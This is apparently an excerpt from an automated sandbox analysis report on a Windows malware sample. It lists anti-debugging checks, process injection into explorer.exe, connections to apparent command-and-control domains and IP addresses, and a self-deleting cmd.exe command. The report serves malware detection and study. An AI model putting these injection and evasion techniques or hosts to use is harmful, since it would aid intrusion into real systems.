          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C4120 mov ecx, dword ptr fs:[00000030h]12_2_055C4120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566FDE2 mov eax, dword ptr fs:[00000030h]12_2_0566FDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566FDE2 mov eax, dword ptr fs:[00000030h]12_2_0566FDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566FDE2 mov eax, dword ptr fs:[00000030h]12_2_0566FDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566FDE2 mov eax, dword ptr fs:[00000030h]12_2_0566FDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056341E8 mov eax, dword ptr fs:[00000030h]12_2_056341E8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05658DF1 mov eax, dword ptr fs:[00000030h]12_2_05658DF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626DC9 mov eax, dword ptr fs:[00000030h]12_2_05626DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626DC9 mov eax, dword ptr fs:[00000030h]12_2_05626DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626DC9 mov eax, dword ptr fs:[00000030h]12_2_05626DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626DC9 mov ecx, dword ptr fs:[00000030h]12_2_05626DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626DC9 mov eax, dword ptr fs:[00000030h]12_2_05626DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626DC9 mov eax, dword ptr fs:[00000030h]12_2_05626DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AB1E1 mov eax, dword ptr fs:[00000030h]12_2_055AB1E1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AB1E1 mov eax, dword ptr fs:[00000030h]12_2_055AB1E1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AB1E1 mov eax, dword ptr fs:[00000030h]12_2_055AB1E1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055BD5E0 mov eax, dword ptr fs:[00000030h]12_2_055BD5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055BD5E0 mov eax, dword ptr fs:[00000030h]12_2_055BD5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056269A6 mov eax, dword ptr fs:[00000030h]12_2_056269A6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DFD9B mov eax, dword ptr fs:[00000030h]12_2_055DFD9B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DFD9B mov eax, dword ptr fs:[00000030h]12_2_055DFD9B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056705AC mov eax, dword ptr fs:[00000030h]12_2_056705AC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056705AC mov eax, dword ptr fs:[00000030h]12_2_056705AC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D2990 mov eax, dword ptr fs:[00000030h]12_2_055D2990
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A2D8A mov eax, dword ptr fs:[00000030h]12_2_055A2D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A2D8A mov eax, dword ptr fs:[00000030h]12_2_055A2D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A2D8A mov eax, dword ptr fs:[00000030h]12_2_055A2D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A2D8A mov eax, dword ptr fs:[00000030h]12_2_055A2D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A2D8A mov eax, dword ptr fs:[00000030h]12_2_055A2D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DA185 mov eax, dword ptr fs:[00000030h]12_2_055DA185
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056251BE mov eax, dword ptr fs:[00000030h]12_2_056251BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056251BE mov eax, dword ptr fs:[00000030h]12_2_056251BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056251BE mov eax, dword ptr fs:[00000030h]12_2_056251BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056251BE mov eax, dword ptr fs:[00000030h]12_2_056251BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D2581 mov eax, dword ptr fs:[00000030h]12_2_055D2581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D2581 mov eax, dword ptr fs:[00000030h]12_2_055D2581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D2581 mov eax, dword ptr fs:[00000030h]12_2_055D2581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D2581 mov eax, dword ptr fs:[00000030h]12_2_055D2581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CC182 mov eax, dword ptr fs:[00000030h]12_2_055CC182
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D1DB5 mov eax, dword ptr fs:[00000030h]12_2_055D1DB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D1DB5 mov eax, dword ptr fs:[00000030h]12_2_055D1DB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D1DB5 mov eax, dword ptr fs:[00000030h]12_2_055D1DB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D35A1 mov eax, dword ptr fs:[00000030h]12_2_055D35A1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D61A0 mov eax, dword ptr fs:[00000030h]12_2_055D61A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D61A0 mov eax, dword ptr fs:[00000030h]12_2_055D61A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C0050 mov eax, dword ptr fs:[00000030h]12_2_055C0050
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C0050 mov eax, dword ptr fs:[00000030h]12_2_055C0050
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05671074 mov eax, dword ptr fs:[00000030h]12_2_05671074
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05662073 mov eax, dword ptr fs:[00000030h]12_2_05662073
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DA44B mov eax, dword ptr fs:[00000030h]12_2_055DA44B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C746D mov eax, dword ptr fs:[00000030h]12_2_055C746D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0563C450 mov eax, dword ptr fs:[00000030h]12_2_0563C450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0563C450 mov eax, dword ptr fs:[00000030h]12_2_0563C450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]12_2_05661C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626C0A mov eax, dword ptr fs:[00000030h]12_2_05626C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626C0A mov eax, dword ptr fs:[00000030h]12_2_05626C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626C0A mov eax, dword ptr fs:[00000030h]12_2_05626C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626C0A mov eax, dword ptr fs:[00000030h]12_2_05626C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0567740D mov eax, dword ptr fs:[00000030h]12_2_0567740D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0567740D mov eax, dword ptr fs:[00000030h]12_2_0567740D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0567740D mov eax, dword ptr fs:[00000030h]12_2_0567740D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D002D mov eax, dword ptr fs:[00000030h]12_2_055D002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D002D mov eax, dword ptr fs:[00000030h]12_2_055D002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D002D mov eax, dword ptr fs:[00000030h]12_2_055D002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D002D mov eax, dword ptr fs:[00000030h]12_2_055D002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D002D mov eax, dword ptr fs:[00000030h]12_2_055D002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055BB02A mov eax, dword ptr fs:[00000030h]12_2_055BB02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055BB02A mov eax, dword ptr fs:[00000030h]12_2_055BB02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055BB02A mov eax, dword ptr fs:[00000030h]12_2_055BB02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055BB02A mov eax, dword ptr fs:[00000030h]12_2_055BB02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DBC2C mov eax, dword ptr fs:[00000030h]12_2_055DBC2C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05674015 mov eax, dword ptr fs:[00000030h]12_2_05674015
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05674015 mov eax, dword ptr fs:[00000030h]12_2_05674015
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05627016 mov eax, dword ptr fs:[00000030h]12_2_05627016
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05627016 mov eax, dword ptr fs:[00000030h]12_2_05627016
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05627016 mov eax, dword ptr fs:[00000030h]12_2_05627016
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626CF0 mov eax, dword ptr fs:[00000030h]12_2_05626CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626CF0 mov eax, dword ptr fs:[00000030h]12_2_05626CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05626CF0 mov eax, dword ptr fs:[00000030h]12_2_05626CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056614FB mov eax, dword ptr fs:[00000030h]12_2_056614FB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05678CD6 mov eax, dword ptr fs:[00000030h]12_2_05678CD6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0563B8D0 mov eax, dword ptr fs:[00000030h]12_2_0563B8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0563B8D0 mov ecx, dword ptr fs:[00000030h]12_2_0563B8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0563B8D0 mov eax, dword ptr fs:[00000030h]12_2_0563B8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0563B8D0 mov eax, dword ptr fs:[00000030h]12_2_0563B8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0563B8D0 mov eax, dword ptr fs:[00000030h]12_2_0563B8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0563B8D0 mov eax, dword ptr fs:[00000030h]12_2_0563B8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A58EC mov eax, dword ptr fs:[00000030h]12_2_055A58EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B849B mov eax, dword ptr fs:[00000030h]12_2_055B849B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A9080 mov eax, dword ptr fs:[00000030h]12_2_055A9080
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DF0BF mov ecx, dword ptr fs:[00000030h]12_2_055DF0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DF0BF mov eax, dword ptr fs:[00000030h]12_2_055DF0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DF0BF mov eax, dword ptr fs:[00000030h]12_2_055DF0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05623884 mov eax, dword ptr fs:[00000030h]12_2_05623884
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05623884 mov eax, dword ptr fs:[00000030h]12_2_05623884
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E90AF mov eax, dword ptr fs:[00000030h]12_2_055E90AF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]12_2_055D20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]12_2_055D20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]12_2_055D20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]12_2_055D20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]12_2_055D20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]12_2_055D20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AF358 mov eax, dword ptr fs:[00000030h]12_2_055AF358
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05678F6A mov eax, dword ptr fs:[00000030h]12_2_05678F6A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055ADB40 mov eax, dword ptr fs:[00000030h]12_2_055ADB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055BEF40 mov eax, dword ptr fs:[00000030h]12_2_055BEF40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D3B7A mov eax, dword ptr fs:[00000030h]12_2_055D3B7A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D3B7A mov eax, dword ptr fs:[00000030h]12_2_055D3B7A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055ADB60 mov ecx, dword ptr fs:[00000030h]12_2_055ADB60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055BFF60 mov eax, dword ptr fs:[00000030h]12_2_055BFF60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05678B58 mov eax, dword ptr fs:[00000030h]12_2_05678B58
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CF716 mov eax, dword ptr fs:[00000030h]12_2_055CF716
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DA70E mov eax, dword ptr fs:[00000030h]12_2_055DA70E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DA70E mov eax, dword ptr fs:[00000030h]12_2_055DA70E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0567070D mov eax, dword ptr fs:[00000030h]12_2_0567070D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0567070D mov eax, dword ptr fs:[00000030h]12_2_0567070D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DE730 mov eax, dword ptr fs:[00000030h]12_2_055DE730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0563FF10 mov eax, dword ptr fs:[00000030h]12_2_0563FF10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0563FF10 mov eax, dword ptr fs:[00000030h]12_2_0563FF10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A4F2E mov eax, dword ptr fs:[00000030h]12_2_055A4F2E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A4F2E mov eax, dword ptr fs:[00000030h]12_2_055A4F2E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566131B mov eax, dword ptr fs:[00000030h]12_2_0566131B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056253CA mov eax, dword ptr fs:[00000030h]12_2_056253CA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056253CA mov eax, dword ptr fs:[00000030h]12_2_056253CA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E37F5 mov eax, dword ptr fs:[00000030h]12_2_055E37F5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CDBE9 mov eax, dword ptr fs:[00000030h]12_2_055CDBE9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]12_2_055D03E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]12_2_055D03E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]12_2_055D03E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]12_2_055D03E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]12_2_055D03E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]12_2_055D03E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05675BA5 mov eax, dword ptr fs:[00000030h]12_2_05675BA5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D2397 mov eax, dword ptr fs:[00000030h]12_2_055D2397
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DB390 mov eax, dword ptr fs:[00000030h]12_2_055DB390
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B8794 mov eax, dword ptr fs:[00000030h]12_2_055B8794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B1B8F mov eax, dword ptr fs:[00000030h]12_2_055B1B8F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B1B8F mov eax, dword ptr fs:[00000030h]12_2_055B1B8F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0565D380 mov ecx, dword ptr fs:[00000030h]12_2_0565D380
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566138A mov eax, dword ptr fs:[00000030h]12_2_0566138A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D4BAD mov eax, dword ptr fs:[00000030h]12_2_055D4BAD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D4BAD mov eax, dword ptr fs:[00000030h]12_2_055D4BAD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D4BAD mov eax, dword ptr fs:[00000030h]12_2_055D4BAD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05627794 mov eax, dword ptr fs:[00000030h]12_2_05627794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05627794 mov eax, dword ptr fs:[00000030h]12_2_05627794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05627794 mov eax, dword ptr fs:[00000030h]12_2_05627794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0565B260 mov eax, dword ptr fs:[00000030h]12_2_0565B260
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0565B260 mov eax, dword ptr fs:[00000030h]12_2_0565B260
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05678A62 mov eax, dword ptr fs:[00000030h]12_2_05678A62
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A9240 mov eax, dword ptr fs:[00000030h]12_2_055A9240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A9240 mov eax, dword ptr fs:[00000030h]12_2_055A9240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A9240 mov eax, dword ptr fs:[00000030h]12_2_055A9240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A9240 mov eax, dword ptr fs:[00000030h]12_2_055A9240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]12_2_055B7E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]12_2_055B7E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]12_2_055B7E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]12_2_055B7E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]12_2_055B7E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]12_2_055B7E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566AE44 mov eax, dword ptr fs:[00000030h]12_2_0566AE44
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566AE44 mov eax, dword ptr fs:[00000030h]12_2_0566AE44
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E927A mov eax, dword ptr fs:[00000030h]12_2_055E927A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CAE73 mov eax, dword ptr fs:[00000030h]12_2_055CAE73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CAE73 mov eax, dword ptr fs:[00000030h]12_2_055CAE73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CAE73 mov eax, dword ptr fs:[00000030h]12_2_055CAE73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CAE73 mov eax, dword ptr fs:[00000030h]12_2_055CAE73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CAE73 mov eax, dword ptr fs:[00000030h]12_2_055CAE73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566EA55 mov eax, dword ptr fs:[00000030h]12_2_0566EA55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05634257 mov eax, dword ptr fs:[00000030h]12_2_05634257
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B766D mov eax, dword ptr fs:[00000030h]12_2_055B766D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C3A1C mov eax, dword ptr fs:[00000030h]12_2_055C3A1C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DA61C mov eax, dword ptr fs:[00000030h]12_2_055DA61C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DA61C mov eax, dword ptr fs:[00000030h]12_2_055DA61C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A5210 mov eax, dword ptr fs:[00000030h]12_2_055A5210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A5210 mov ecx, dword ptr fs:[00000030h]12_2_055A5210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A5210 mov eax, dword ptr fs:[00000030h]12_2_055A5210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A5210 mov eax, dword ptr fs:[00000030h]12_2_055A5210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AAA16 mov eax, dword ptr fs:[00000030h]12_2_055AAA16
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AAA16 mov eax, dword ptr fs:[00000030h]12_2_055AAA16
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B8A0A mov eax, dword ptr fs:[00000030h]12_2_055B8A0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0565FE3F mov eax, dword ptr fs:[00000030h]12_2_0565FE3F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AC600 mov eax, dword ptr fs:[00000030h]12_2_055AC600
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0040A150 LdrLoadDll,3_2_0040A150
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.coraroseromance.net
          Source: C:\Windows\explorer.exeDomain query: www.foldemforever.com
          Source: C:\Windows\explorer.exeDomain query: www.fuugiti.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.loveuco.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.18.171 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.250 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: F50000Jump to behavior
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeThread register set: target process: 684Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 684Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess created: C:\Windows\SysWOW64\ByteCodeGenerator.exe C:\Windows\SysWOW64\ByteCodeGenerator.exeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\ByteCodeGenerator.exe"Jump to behavior
          Source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.477624235.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.529461313.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.529001079.0000000000E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
